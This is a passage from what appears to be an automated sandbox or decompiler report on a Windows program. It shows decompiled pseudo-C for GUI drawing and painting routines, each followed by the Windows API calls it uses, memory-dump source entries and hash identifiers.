                                                                                											if(__eflags == 0) {
                                                                                												L19:
                                                                                												E0041F338( *((intOrPtr*)(_t260 + 0x14)), _t242, 0x8000000d, _t257, _t265, __eflags);
                                                                                												E0041EB4C( *((intOrPtr*)(_t260 + 0xc)), 0x8000000e);
                                                                                												goto L21;
                                                                                											}
                                                                                											_t256 =  *0x45c128; // 0x0
                                                                                											__eflags = _t256 - ( *( *_t240 + 0x248) &  *0x45c124);
                                                                                											if(__eflags == 0) {
                                                                                												goto L20;
                                                                                											}
                                                                                											goto L19;
                                                                                										}
                                                                                										_t232 =  *_t240;
                                                                                										__eflags =  *(_t232 + 0x1c) & 0x00000010;
                                                                                										if(( *(_t232 + 0x1c) & 0x00000010) == 0) {
                                                                                											goto L22;
                                                                                										}
                                                                                										goto L16;
                                                                                									}
                                                                                									_t233 =  *_t240;
                                                                                									__eflags =  *(_t233 + 0x249) & 0x00000004;
                                                                                									if(( *(_t233 + 0x249) & 0x00000004) == 0) {
                                                                                										goto L14;
                                                                                									}
                                                                                									_t234 =  *_t240;
                                                                                									__eflags =  *((char*)(_t234 + 0x28d));
                                                                                									if( *((char*)(_t234 + 0x28d)) == 0) {
                                                                                										goto L14;
                                                                                									}
                                                                                									_t235 =  *_t240;
                                                                                									__eflags =  *(_t235 + 0x1c) & 0x00000010;
                                                                                									if(( *(_t235 + 0x1c) & 0x00000010) == 0) {
                                                                                										goto L39;
                                                                                									}
                                                                                									goto L14;
                                                                                								}
                                                                                							}
                                                                                							break;
                                                                                						}
                                                                                						_v49.top =  *((intOrPtr*)(_a24 - 0x40)) + _v49.bottom;
                                                                                						_t130 =  &_v16;
                                                                                						 *_t130 = _v16 + 1;
                                                                                						__eflags =  *_t130;
                                                                                						continue;
                                                                                					}
                                                                                					break;
                                                                                				}
                                                                                				return _t138;
                                                                                			}






































                                                                                0x0045bf89
                                                                                0x0045bf8f
                                                                                0x0045bf91
                                                                                0x0045bf98
                                                                                0x0045bf9e
                                                                                0x0045bfa7
                                                                                0x0045bfaa
                                                                                0x0045bfb0
                                                                                0x0045bfb9
                                                                                0x0045bfba
                                                                                0x0045bfbb
                                                                                0x0045bfbc
                                                                                0x0045bfbd
                                                                                0x0045bfbe
                                                                                0x0045bfc1
                                                                                0x0045bfc8
                                                                                0x0045bfd5
                                                                                0x0045bfd8
                                                                                0x0045bfdf
                                                                                0x0045bfe7
                                                                                0x0045bfe7
                                                                                0x0045bfe7
                                                                                0x0045bfe7
                                                                                0x0045bfca
                                                                                0x0045bfd0
                                                                                0x0045bfd0
                                                                                0x0045c008
                                                                                0x0045c02b
                                                                                0x0045c02b
                                                                                0x0045bfb0
                                                                                0x0045bf98
                                                                                0x0045bf89
                                                                                0x0045c030
                                                                                0x0045c032
                                                                                0x0045c039
                                                                                0x0045c03f
                                                                                0x0045c041
                                                                                0x0045c045
                                                                                0x0045c04b
                                                                                0x0045c04f
                                                                                0x0045c051
                                                                                0x0045c061
                                                                                0x0045c068
                                                                                0x0045c06b
                                                                                0x0045c06f
                                                                                0x0045c076
                                                                                0x0045c07e
                                                                                0x0045c083
                                                                                0x0045c085
                                                                                0x0045c0a7
                                                                                0x0045c0a8
                                                                                0x0045c0a9
                                                                                0x0045c0aa
                                                                                0x0045c0ab
                                                                                0x0045c0af
                                                                                0x0045c0b5
                                                                                0x0045c0ca
                                                                                0x0045c087
                                                                                0x0045c099
                                                                                0x0045c099
                                                                                0x0045c085
                                                                                0x0045c076
                                                                                0x0045c06b
                                                                                0x0045c04f
                                                                                0x0045c045
                                                                                0x00000000
                                                                                0x0045c039
                                                                                0x0045bf0c
                                                                                0x0045bf10
                                                                                0x0045bf2e
                                                                                0x0045bf36
                                                                                0x0045bf43
                                                                                0x00000000
                                                                                0x0045bf43
                                                                                0x0045bf22
                                                                                0x0045bf29
                                                                                0x0045bf2c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045bf2c
                                                                                0x0045beea
                                                                                0x0045beec
                                                                                0x0045bef0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045bef0
                                                                                0x0045bebd
                                                                                0x0045bebf
                                                                                0x0045bec6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045bec8
                                                                                0x0045beca
                                                                                0x0045bed1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045bed3
                                                                                0x0045bed5
                                                                                0x0045bed9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045bed9
                                                                                0x0045be6d
                                                                                0x00000000
                                                                                0x0045c0ec
                                                                                0x0045c0fb
                                                                                0x0045c0fe
                                                                                0x0045c0fe
                                                                                0x0045c0fe
                                                                                0x00000000
                                                                                0x0045c0fe
                                                                                0x00000000
                                                                                0x0045c114
                                                                                0x0045c120

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cece8a76ed6c42ea098dfc4e10f05c1ef134cf81c6061f06068430d5f36978dc
                                                                                • Instruction ID: 837a3775693fb1747dfe6eea28fc7c014706e51f64b2177a40ed002ee77a759f
                                                                                • Opcode Fuzzy Hash: cece8a76ed6c42ea098dfc4e10f05c1ef134cf81c6061f06068430d5f36978dc
                                                                                • Instruction Fuzzy Hash: 2AB11B75A006189FDB10DF58C485BEEB7F5EF09305F1440A6ED44AB3A2C778AC4ACB55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 89%
                                                                                			E0044E634(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _v8;
                                                                                				signed char _t92;
                                                                                				int _t98;
                                                                                				int _t100;
                                                                                				intOrPtr _t117;
                                                                                				int _t122;
                                                                                				intOrPtr _t155;
                                                                                				void* _t164;
                                                                                				signed char _t180;
                                                                                				intOrPtr _t182;
                                                                                				intOrPtr _t194;
                                                                                				int _t199;
                                                                                				intOrPtr _t203;
                                                                                				void* _t204;
                                                                                
                                                                                				_t204 = __eflags;
                                                                                				_t202 = _t203;
                                                                                				_v8 = __eax;
                                                                                				E00438704(_v8);
                                                                                				_push(_t203);
                                                                                				_push(0x44e88a);
                                                                                				_push( *[fs:edx]);
                                                                                				 *[fs:edx] = _t203;
                                                                                				 *(_v8 + 0x268) = 0;
                                                                                				 *(_v8 + 0x26c) = 0;
                                                                                				 *(_v8 + 0x270) = 0;
                                                                                				_t164 = 0;
                                                                                				_t92 =  *0x487709; // 0x0
                                                                                				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
                                                                                				E00437E74(_v8, 0, __edx, _t204);
                                                                                				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
                                                                                					L12:
                                                                                					_t98 =  *(_v8 + 0x268);
                                                                                					_t213 = _t98;
                                                                                					if(_t98 > 0) {
                                                                                						E004350BC(_v8, _t98, _t213);
                                                                                					}
                                                                                					_t100 =  *(_v8 + 0x26c);
                                                                                					_t214 = _t100;
                                                                                					if(_t100 > 0) {
                                                                                						E00435100(_v8, _t100, _t214);
                                                                                					}
                                                                                					_t180 =  *0x44e898; // 0x0
                                                                                					 *(_v8 + 0x98) = _t180;
                                                                                					_t215 = _t164;
                                                                                					if(_t164 == 0) {
                                                                                						E0044DB9C(_v8, 1, 1);
                                                                                						E0043B818(_v8, 1, 1, _t215);
                                                                                					}
                                                                                					E00436848(_v8, 0, 0xb03d, 0);
                                                                                					_pop(_t182);
                                                                                					 *[fs:eax] = _t182;
                                                                                					_push(0x44e891);
                                                                                					return E0043870C(_v8);
                                                                                				} else {
                                                                                					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
                                                                                						_t194 =  *0x487c00; // 0x22e0f1c
                                                                                						if( *(_v8 + 0x25c) !=  *((intOrPtr*)(_t194 + 0x40))) {
                                                                                							_t155 =  *0x487c00; // 0x22e0f1c
                                                                                							E0041ED34( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E0041ED2C( *((intOrPtr*)(_v8 + 0x68))),  *(_t155 + 0x40),  *(_v8 + 0x25c)), __edi, _t202);
                                                                                						}
                                                                                					}
                                                                                					_t117 =  *0x487c00; // 0x22e0f1c
                                                                                					 *(_v8 + 0x25c) =  *(_t117 + 0x40);
                                                                                					_t199 = E0044E9BC(_v8);
                                                                                					_t122 =  *(_v8 + 0x270);
                                                                                					_t209 = _t199 - _t122;
                                                                                					if(_t199 != _t122) {
                                                                                						_t164 = 1;
                                                                                						E0044DB9C(_v8, _t122, _t199);
                                                                                						E0043B818(_v8,  *(_v8 + 0x270), _t199, _t209);
                                                                                						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
                                                                                							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
                                                                                						}
                                                                                						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
                                                                                							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
                                                                                						}
                                                                                						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
                                                                                							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
                                                                                							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
                                                                                						}
                                                                                					}
                                                                                					goto L12;
                                                                                				}
                                                                                			}


















                                                                                APIs
                                                                                • MulDiv.KERNEL32(00000000,?,00000000), ref: 0044E6F3
                                                                                • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E76F
                                                                                • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E79E
                                                                                • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E7CD
                                                                                • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E7F0
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 179e502b649ba4b6491df2e8353e2539bc661f28efba15cfb078de0c6466ef6c
                                                                                • Instruction ID: 4bc58ff00013c07b577bdc672f5bb2155b15ba06c25ac9d37719f0d5c6b72ce6
                                                                                • Opcode Fuzzy Hash: 179e502b649ba4b6491df2e8353e2539bc661f28efba15cfb078de0c6466ef6c
                                                                                • Instruction Fuzzy Hash: 8371C474A04104EFDB04EBA9C589AADB7F5BF49304F2541F9E808EB362C739AE41DB44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 85%
                                                                                			E004459FC(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr _v12;
                                                                                				void* _v16;
                                                                                				struct tagRECT _v32;
                                                                                				void* _t53;
                                                                                				int _t63;
                                                                                				CHAR* _t65;
                                                                                				void* _t76;
                                                                                				void* _t78;
                                                                                				int _t89;
                                                                                				CHAR* _t91;
                                                                                				int _t117;
                                                                                				intOrPtr _t127;
                                                                                				void* _t139;
                                                                                				void* _t144;
                                                                                				char _t153;
                                                                                
                                                                                				_t120 = __ecx;
                                                                                				_t143 = _t144;
                                                                                				_v16 = 0;
                                                                                				_v12 = __ecx;
                                                                                				_v8 = __edx;
                                                                                				_t139 = __eax;
                                                                                				_t117 = _a4;
                                                                                				_push(_t144);
                                                                                				_push(0x445be0);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t144 + 0xffffffe4;
                                                                                				_t53 = E00447860(__eax);
                                                                                				_t135 = _t53;
                                                                                				if(_t53 != 0 && E00448E9C(_t135) != 0) {
                                                                                					if((_t117 & 0x00000000) != 0) {
                                                                                						__eflags = (_t117 & 0x00000002) - 2;
                                                                                						if((_t117 & 0x00000002) == 2) {
                                                                                							_t117 = _t117 & 0xfffffffd;
                                                                                							__eflags = _t117;
                                                                                						}
                                                                                					} else {
                                                                                						_t117 = _t117 & 0xffffffff | 0x00000002;
                                                                                					}
                                                                                					_t117 = _t117 | 0x00020000;
                                                                                				}
                                                                                				E004043B8( &_v16, _v12);
                                                                                				if((_t117 & 0x00000004) == 0) {
                                                                                					L12:
                                                                                					E0040471C(_v16, 0x445c04);
                                                                                					if(_t153 != 0) {
                                                                                						E0041F454( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
                                                                                						__eflags =  *((char*)(_t139 + 0x3a));
                                                                                						if( *((char*)(_t139 + 0x3a)) != 0) {
                                                                                							_t136 =  *((intOrPtr*)(_v8 + 0xc));
                                                                                							__eflags = E0041EE0C( *((intOrPtr*)(_v8 + 0xc))) |  *0x445c08;
                                                                                							E0041EE18( *((intOrPtr*)(_v8 + 0xc)), E0041EE0C( *((intOrPtr*)(_v8 + 0xc))) |  *0x445c08, _t136, _t139, _t143);
                                                                                						}
                                                                                						__eflags =  *((char*)(_t139 + 0x39));
                                                                                						if( *((char*)(_t139 + 0x39)) != 0) {
                                                                                							L24:
                                                                                							_t63 = E004045D8(_v16);
                                                                                							_t65 = E004047D0(_v16);
                                                                                							DrawTextA(E0041FDC4(_v8), _t65, _t63, _a12, _t117);
                                                                                							L25:
                                                                                							_pop(_t127);
                                                                                							 *[fs:eax] = _t127;
                                                                                							_push(0x445be7);
                                                                                							return E00404320( &_v16);
                                                                                						} else {
                                                                                							__eflags = _a8;
                                                                                							if(_a8 == 0) {
                                                                                								OffsetRect(_a12, 1, 1);
                                                                                								E0041EB4C( *((intOrPtr*)(_v8 + 0xc)), 0x80000014);
                                                                                								_t89 = E004045D8(_v16);
                                                                                								_t91 = E004047D0(_v16);
                                                                                								DrawTextA(E0041FDC4(_v8), _t91, _t89, _a12, _t117);
                                                                                								OffsetRect(_a12, 0xffffffff, 0xffffffff);
                                                                                							}
                                                                                							__eflags = _a8;
                                                                                							if(_a8 == 0) {
                                                                                								L23:
                                                                                								E0041EB4C( *((intOrPtr*)(_v8 + 0xc)), 0x80000010);
                                                                                							} else {
                                                                                								_t76 = E0041E68C(0x8000000d);
                                                                                								_t78 = E0041E68C(0x80000010);
                                                                                								__eflags = _t76 - _t78;
                                                                                								if(_t76 != _t78) {
                                                                                									goto L23;
                                                                                								}
                                                                                								E0041EB4C( *((intOrPtr*)(_v8 + 0xc)), 0x80000014);
                                                                                							}
                                                                                							goto L24;
                                                                                						}
                                                                                					}
                                                                                					if((_t117 & 0x00000004) == 0) {
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						_v32.top = _v32.top + 4;
                                                                                						DrawEdge(E0041FDC4(_v8),  &_v32, 6, 2);
                                                                                					}
                                                                                					goto L25;
                                                                                				} else {
                                                                                					if(_v16 == 0) {
                                                                                						L11:
                                                                                						E004045E0( &_v16, 0x445bf8);
                                                                                						goto L12;
                                                                                					}
                                                                                					if( *_v16 != 0x26) {
                                                                                						goto L12;
                                                                                					}
                                                                                					_t153 =  *((char*)(_v16 + 1));
                                                                                					if(_t153 != 0) {
                                                                                						goto L12;
                                                                                					}
                                                                                					goto L11;
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 00445ACB
                                                                                • OffsetRect.USER32(?,00000001,00000001), ref: 00445B1C
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00445B51
                                                                                • OffsetRect.USER32(?,000000FF,000000FF), ref: 00445B5E
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00445BC5
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Draw$OffsetRectText$Edge
                                                                                • String ID:
                                                                                • API String ID: 3610532707-0
                                                                                • Opcode ID: 433828e7e3ec566315ab3be7533957cae28c9e632e97fc2d6305ba227f22d50c
                                                                                • Instruction ID: 68969ed9cb05b664d4419c1763d0a6a8e74d1c20bfe0b3deb612a047e544336f
                                                                                • Opcode Fuzzy Hash: 433828e7e3ec566315ab3be7533957cae28c9e632e97fc2d6305ba227f22d50c
                                                                                • Instruction Fuzzy Hash: F7516174A04648AFEF10EBA9C881B9EB7E5EF45314F24856BF910E7392C73CAD418719
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 77%
                                                                                			E0042A6C8(intOrPtr* __eax, void* __ebx, signed int __ecx, struct tagRECT* __edx, void* __edi, void* __esi) {
                                                                                				char _v8;
                                                                                				int _t40;
                                                                                				CHAR* _t42;
                                                                                				int _t54;
                                                                                				CHAR* _t56;
                                                                                				int _t65;
                                                                                				CHAR* _t67;
                                                                                				intOrPtr* _t76;
                                                                                				intOrPtr _t86;
                                                                                				struct tagRECT* _t91;
                                                                                				signed int _t93;
                                                                                				int _t94;
                                                                                				intOrPtr _t97;
                                                                                				signed int _t104;
                                                                                
                                                                                				_push(0);
                                                                                				_t93 = __ecx;
                                                                                				_t91 = __edx;
                                                                                				_t76 = __eax;
                                                                                				_push(_t97);
                                                                                				_push(0x42a81e);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t97;
                                                                                				 *((intOrPtr*)( *__eax + 0x90))();
                                                                                				if((__ecx & 0x00000400) != 0 && (_v8 == 0 ||  *((char*)(__eax + 0x170)) != 0 &&  *_v8 == 0x26 &&  *((char*)(_v8 + 1)) == 0)) {
                                                                                					E004045E0( &_v8, 0x42a834);
                                                                                				}
                                                                                				if( *((char*)(_t76 + 0x170)) == 0) {
                                                                                					_t104 = _t93;
                                                                                				}
                                                                                				_t94 = E00437978(_t76, _t93, _t104);
                                                                                				E0041FCC0( *((intOrPtr*)(_t76 + 0x160)));
                                                                                				if( *((intOrPtr*)( *_t76 + 0x50))() != 0) {
                                                                                					_t40 = E004045D8(_v8);
                                                                                					_t42 = E004047D0(_v8);
                                                                                					DrawTextA(E0041FDC4( *((intOrPtr*)(_t76 + 0x160))), _t42, _t40, _t91, _t94);
                                                                                				} else {
                                                                                					OffsetRect(_t91, 1, 1);
                                                                                					E0041EB4C( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0x80000014);
                                                                                					_t54 = E004045D8(_v8);
                                                                                					_t56 = E004047D0(_v8);
                                                                                					DrawTextA(E0041FDC4( *((intOrPtr*)(_t76 + 0x160))), _t56, _t54, _t91, _t94);
                                                                                					OffsetRect(_t91, 0xffffffff, 0xffffffff);
                                                                                					E0041EB4C( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0x80000010);
                                                                                					_t65 = E004045D8(_v8);
                                                                                					_t67 = E004047D0(_v8);
                                                                                					DrawTextA(E0041FDC4( *((intOrPtr*)(_t76 + 0x160))), _t67, _t65, _t91, _t94);
                                                                                				}
                                                                                				_pop(_t86);
                                                                                				 *[fs:eax] = _t86;
                                                                                				_push(0x42a825);
                                                                                				return E00404320( &_v8);
                                                                                			}

                                                                                APIs
                                                                                • OffsetRect.USER32(?,00000001,00000001), ref: 0042A762
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042A79A
                                                                                • OffsetRect.USER32(?,000000FF,000000FF), ref: 0042A7A4
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042A7DC
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042A803
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: DrawText$OffsetRect
                                                                                • String ID:
                                                                                • API String ID: 1886049697-0
                                                                                • Opcode ID: b60231cd72ad85705e77e8efa6ebb8b133de81342258a358bc1fefc26b871bcd
                                                                                • Instruction ID: 4b3dc32afda254e071bd1cc5476ee5deb2a80a2c0b6ed73c94728484337b1361
                                                                                • Opcode Fuzzy Hash: b60231cd72ad85705e77e8efa6ebb8b133de81342258a358bc1fefc26b871bcd
                                                                                • Instruction Fuzzy Hash: 8231A070600114AFDB10EB2ADC85F8BB7F8AF46318F5440BBF904EB292CB789D119729
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 85%
                                                                                			E00439A64(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                				intOrPtr* _v8;
                                                                                				intOrPtr _v12;
                                                                                				int _v16;
                                                                                				int _v20;
                                                                                				struct tagPAINTSTRUCT _v84;
                                                                                				intOrPtr _t55;
                                                                                				void* _t64;
                                                                                				struct HDC__* _t75;
                                                                                				intOrPtr _t84;
                                                                                				void* _t95;
                                                                                				void* _t96;
                                                                                				void* _t98;
                                                                                				void* _t100;
                                                                                				void* _t101;
                                                                                				intOrPtr _t102;
                                                                                
                                                                                				_t100 = _t101;
                                                                                				_t102 = _t101 + 0xffffffb0;
                                                                                				_v12 = __edx;
                                                                                				_v8 = __eax;
                                                                                				_t75 =  *(_v12 + 4);
                                                                                				if(_t75 == 0) {
                                                                                					_t75 = BeginPaint(E0043BD14(_v8),  &_v84);
                                                                                				}
                                                                                				_push(_t100);
                                                                                				_push(0x439b84);
                                                                                				_push( *[fs:edx]);
                                                                                				 *[fs:edx] = _t102;
                                                                                				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
                                                                                					_v20 = SaveDC(_t75);
                                                                                					_v16 = 2;
                                                                                					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
                                                                                					if(_t95 >= 0) {
                                                                                						_t96 = _t95 + 1;
                                                                                						_t98 = 0;
                                                                                						do {
                                                                                							_t64 = E00413FA4( *((intOrPtr*)(_v8 + 0x198)), _t98);
                                                                                							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
                                                                                								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
                                                                                									goto L11;
                                                                                								} else {
                                                                                									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
                                                                                									if(_v16 != 1) {
                                                                                										goto L11;
                                                                                									}
                                                                                								}
                                                                                							} else {
                                                                                								goto L11;
                                                                                							}
                                                                                							goto L12;
                                                                                							L11:
                                                                                							_t98 = _t98 + 1;
                                                                                							_t96 = _t96 - 1;
                                                                                						} while (_t96 != 0);
                                                                                					}
                                                                                					L12:
                                                                                					if(_v16 != 1) {
                                                                                						 *((intOrPtr*)( *_v8 + 0xb8))();
                                                                                					}
                                                                                					RestoreDC(_t75, _v20);
                                                                                				} else {
                                                                                					 *((intOrPtr*)( *_v8 + 0xb8))();
                                                                                				}
                                                                                				E00439BC0(_v8, 0, _t75);
                                                                                				_pop(_t84);
                                                                                				 *[fs:eax] = _t84;
                                                                                				_push(0x439b8b);
                                                                                				_t55 = _v12;
                                                                                				if( *((intOrPtr*)(_t55 + 4)) == 0) {
                                                                                					return EndPaint(E0043BD14(_v8),  &_v84);
                                                                                				}
                                                                                				return _t55;
                                                                                			}

                                                                                APIs
                                                                                • BeginPaint.USER32(00000000,?), ref: 00439A8A
                                                                                • SaveDC.GDI32(?), ref: 00439ABE
                                                                                • ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 00439B20
                                                                                • RestoreDC.GDI32(?,?), ref: 00439B4A
                                                                                • EndPaint.USER32(00000000,?,00439B8B), ref: 00439B7E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                • String ID:
                                                                                • API String ID: 3808407030-0
                                                                                • Opcode ID: 910f335cdd0922cf31afe9397841251fae4aface1fcd7c0656e0dbac6a07a740
                                                                                • Instruction ID: a0e3ca0c4c3b25b8cfb113fc5e9187cfd12e9294f5ee593db24c94ab03605c7e
                                                                                • Opcode Fuzzy Hash: 910f335cdd0922cf31afe9397841251fae4aface1fcd7c0656e0dbac6a07a740
                                                                                • Instruction Fuzzy Hash: 28414B70A04204AFCB04DF99C884EAEB7F9FF48318F1590AAE5049B362D7B9AD45CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E00466B10(void* __ecx, void* __edx, void* __eflags, signed int _a4, char _a8, void* _a12) {
                                                                                				struct tagRECT _v20;
                                                                                				void* __edi;
                                                                                				void* __ebp;
                                                                                				int _t17;
                                                                                				CHAR* _t19;
                                                                                				int _t31;
                                                                                				CHAR* _t33;
                                                                                				int _t43;
                                                                                				CHAR* _t45;
                                                                                				void* _t49;
                                                                                				signed int _t56;
                                                                                				int _t57;
                                                                                				void* _t61;
                                                                                
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				_t60 = __ecx;
                                                                                				_t49 = __edx;
                                                                                				_t56 = _a4;
                                                                                				E0041F454( *((intOrPtr*)(__edx + 0x14)), __ecx, 1, _t56, _t61, __eflags);
                                                                                				if(_a8 != 1) {
                                                                                					_t57 = _t56 | 0x00000005;
                                                                                					__eflags = _t57;
                                                                                					_t17 = E004045D8(__ecx);
                                                                                					_t19 = E004047D0(__ecx);
                                                                                					return DrawTextA(E0041FDC4(_t49), _t19, _t17,  &_v20, _t57);
                                                                                				}
                                                                                				OffsetRect( &_v20, 1, 1);
                                                                                				E0041EB4C( *((intOrPtr*)(_t49 + 0xc)), 0x80000014);
                                                                                				_t31 = E004045D8(_t60);
                                                                                				_t33 = E004047D0(_t60);
                                                                                				DrawTextA(E0041FDC4(_t49), _t33, _t31,  &_v20, _t56 | 0x00000005);
                                                                                				OffsetRect( &_v20, 0xffffffff, 0xffffffff);
                                                                                				E0041EB4C( *((intOrPtr*)(_t49 + 0xc)), 0x80000010);
                                                                                				_t43 = E004045D8(_t60);
                                                                                				_t45 = E004047D0(_t60);
                                                                                				return DrawTextA(E0041FDC4(_t49), _t45, _t43,  &_v20, _t56 | 0x00000005);
                                                                                			}

                                                                                APIs
                                                                                • OffsetRect.USER32(?,00000001,00000001), ref: 00466B46
